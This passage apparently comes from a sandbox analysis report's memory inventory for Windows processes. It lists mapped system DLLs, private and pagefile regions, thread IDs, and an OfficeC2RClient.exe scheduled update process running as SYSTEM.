Region: id = 4390 start_va = 0x7fefb680000 end_va = 0x7fefb6a6fff entry_point = 0x7fefb680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4391 start_va = 0x7fefd080000 end_va = 0x7fefd089fff entry_point = 0x7fefd080000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 4392 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4393 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4394 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4395 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4396 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 4397 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4398 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 4399 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 4479 start_va = 0x340000 end_va = 0x340fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 4480 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 4481 start_va = 0x360000 end_va = 0x36bfff entry_point = 0x360000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 4482 start_va = 0x370000 end_va = 0x371fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 4483 start_va = 0x380000 end_va = 0x387fff entry_point = 0x380000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 4484 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x390000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 4485 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 4486 start_va = 0x3040000 end_va = 0x313ffff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 4487 start_va = 0x3140000 end_va = 0x323ffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 4488 start_va = 0x3270000 end_va = 0x327ffff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 4489 start_va = 0x32c0000 end_va = 0x33bffff entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 4490 start_va = 0x33e0000 end_va = 0x34dffff entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 4491 start_va = 0x34e0000 end_va = 0x3822fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000034e0000" filename = "" Region: id = 4492 start_va = 0x3910000 end_va = 0x391ffff entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 4493 start_va = 0x3920000 end_va = 0x399ffff entry_point = 0x0 region_type = private name = "private_0x0000000003920000" filename = "" Region: id = 4494 start_va = 0x3a60000 end_va = 0x3b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a60000" filename = "" Region: id = 4495 start_va = 0x3d00000 end_va = 0x3dfffff entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 4496 start_va = 0x7fef4d40000 end_va = 0x7fef4d5bfff entry_point = 0x7fef4d40000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 4497 start_va = 0x7fef4d60000 end_va = 0x7fef4dc1fff entry_point = 0x7fef4d60000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 4498 start_va = 0x7fef6570000 end_va = 0x7fef6580fff entry_point = 0x7fef6570000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 4499 start_va = 0x7fef9190000 end_va = 0x7fef922ffff entry_point = 0x7fef9190000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 4500 start_va = 0x7fef93b0000 end_va = 0x7fef93b8fff entry_point = 0x7fef93b0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 4501 start_va = 0x7fefbb00000 end_va = 0x7fefbb2cfff entry_point = 0x7fefbb00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4502 start_va = 0x7fefbc10000 end_va = 0x7fefbc17fff entry_point = 0x7fefbc10000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4503 start_va = 0x7fefc080000 end_va = 0x7fefc097fff entry_point = 0x7fefc080000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4504 start_va = 0x7fefc690000 end_va = 0x7fefc883fff entry_point = 0x7fefc690000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 4505 start_va = 0x7fefcd50000 end_va = 0x7fefcd5bfff entry_point = 0x7fefcd50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4506 start_va = 0x7fefd2a0000 end_va = 0x7fefd2fafff entry_point = 0x7fefd2a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4507 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4508 start_va = 0x7fefdce0000 end_va = 0x7fefdd15fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4509 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4510 start_va = 0x7fefee80000 end_va = 0x7feff0d8fff entry_point = 0x7fefee80000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4511 start_va = 0x7feff6e0000 end_va = 0x7feff857fff entry_point = 0x7feff6e0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 4512 start_va = 0x7feff870000 end_va = 0x7feff999fff entry_point = 0x7feff870000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 4513 start_va = 0x7feffe60000 end_va = 0x7feffeb1fff entry_point = 0x7feffe60000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 4514 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 4515 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 4516 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4517 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4518 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 4764 start_va = 0x640000 end_va = 0x641fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 4765 start_va = 0x3c00000 end_va = 0x3cfffff entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 4766 start_va = 0x3e70000 end_va = 0x3eeffff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 4767 start_va = 0x3f20000 end_va = 0x401ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f20000" filename = "" Region: id = 4768 start_va = 0x4020000 end_va = 0x421ffff entry_point = 0x0 region_type = private name = "private_0x0000000004020000" filename = "" Region: id = 4769 start_va = 0x42e0000 end_va = 0x43dffff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 4770 start_va = 0x45c0000 end_va = 0x46bffff entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 4771 start_va = 0x46c0000 end_va = 0x4abffff entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 4772 start_va = 0x7fef96b0000 end_va = 0x7fef9702fff entry_point = 0x7fef96b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4773 start_va = 0x7fefce20000 end_va = 0x7fefce26fff entry_point = 0x7fefce20000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4774 start_va = 0x7fefcf10000 end_va = 0x7fefcf2afff entry_point = 0x7fefcf10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4775 start_va = 0x7fefd0c0000 end_va = 0x7fefd10bfff entry_point = 0x7fefd0c0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4776 start_va = 0x7fefd210000 end_va = 0x7fefd266fff entry_point = 0x7fefd210000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 4777 start_va = 0x7fefd410000 end_va = 0x7fefd416fff entry_point = 0x7fefd410000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4778 start_va = 0x7fefd420000 end_va = 0x7fefd474fff entry_point = 0x7fefd420000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4779 start_va = 0x7fefd5f0000 end_va = 0x7fefd611fff entry_point = 0x7fefd5f0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4780 start_va = 0x7fefd620000 end_va = 0x7fefd66dfff entry_point = 0x7fefd620000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4781 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 4782 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 4783 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 4784 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4817 start_va = 0x7fefc040000 end_va = 0x7fefc074fff entry_point = 0x7fefc040000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 4818 start_va = 0x7fefcb80000 end_va = 0x7fefcbabfff entry_point = 0x7fefcb80000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4819 start_va = 0x7fefddd0000 end_va = 0x7fefdde9fff entry_point = 0x7fefddd0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4820 start_va = 0x7feff2f0000 end_va = 0x7feff4c6fff entry_point = 0x7feff2f0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Thread: id = 195 os_tid = 0x594 Thread: id = 204 os_tid = 0xbbc Thread: id = 206 os_tid = 0x3c4 Thread: id = 207 os_tid = 0x250 Thread: id = 208 os_tid = 0x7f0 Thread: id = 225 os_tid = 0xa8c Thread: id = 226 os_tid = 0xa98 Thread: id = 231 os_tid = 0xab0 Thread: id = 233 os_tid = 0xaa4 Thread: id = 235 os_tid = 0xa78 Thread: id = 238 os_tid = 0xa80 Thread: id = 240 os_tid = 0xa68 Thread: id = 241 os_tid = 0x6c0 Thread: id = 246 os_tid = 0x754 Thread: id = 297 os_tid = 0x7ac Thread: id = 300 os_tid = 0x830 Process: id = "30" image_name = "officec2rclient.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe" page_root = "0x6be1c000" os_pid = "0x12c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0xa58" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\" /update SCHEDULEDTASK displaylevel=False" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d435" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3868 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3869 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3870 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3871 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 3872 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3873 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3874 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3875 start_va = 0x13ff30000 end_va = 0x140f72fff entry_point = 0x13ff30000 region_type = mapped_file name = "officec2rclient.exe" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe") Region: id = 3876 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3877 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3878 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3879 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3905 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3906 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3907 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 3908 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3909 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3910 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3911 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3912 start_va = 0x7fef30d0000 end_va = 0x7fef30f6fff entry_point = 0x7fef30d0000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 3913 start_va = 0x7fefb730000 end_va = 0x7fefb73afff entry_point = 0x7fefb730000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 3914 start_va = 0x7fefbee0000 end_va = 0x7fefbef0fff entry_point = 0x7fefbee0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3915 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3916 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3917 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3918 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3919 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3920 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3921 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3922 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3923 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3942 start_va = 0x7fef7de0000 end_va = 0x7fef7dfafff entry_point = 0x7fef7de0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 3943 start_va = 0x7fefc290000 end_va = 0x7fefc4a4fff entry_point = 0x7fefc290000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 3944 start_va = 0x7fef8360000 end_va = 0x7fef8366fff entry_point = 0x7fef8360000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 3945 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3948 start_va = 0x7fefdce0000 end_va = 0x7fefdd15fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3949 start_va = 0x7fefddd0000 end_va = 0x7fefdde9fff entry_point = 0x7fefddd0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3950 start_va = 0x7feff2f0000 end_va = 0x7feff4c6fff entry_point = 0x7feff2f0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3951 start_va = 0x7fef8b10000 end_va = 0x7fef8b8bfff entry_point = 0x7fef8b10000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 3952 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3953 start_va = 0x7fefdd20000 end_va = 0x7fefdd59fff entry_point = 0x7fefdd20000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3954 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4096 start_va = 0x7fef7a40000 end_va = 0x7fef7ab5fff entry_point = 0x7fef7a40000 region_type = mapped_file name = "apiclient.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll") Region: id = 4110 start_va = 0x7fef7c10000 end_va = 0x7fef7c13fff entry_point = 0x7fef7c10000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 4111 start_va = 0x7fef7c20000 end_va = 0x7fef7c23fff entry_point = 0x7fef7c20000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 4112 start_va = 0x7fef7c30000 end_va = 0x7fef7c32fff entry_point = 0x7fef7c30000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 4113 start_va = 0x7fef7c40000 end_va = 0x7fef7c43fff entry_point = 0x7fef7c40000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 4114 start_va = 0x7fef7c50000 end_va = 0x7fef7c52fff entry_point = 0x7fef7c50000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll") Region: id = 4115 start_va = 0x7fef7c60000 end_va = 0x7fef7c62fff entry_point = 0x7fef7c60000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Program Files\\Common Files\\Microsoft 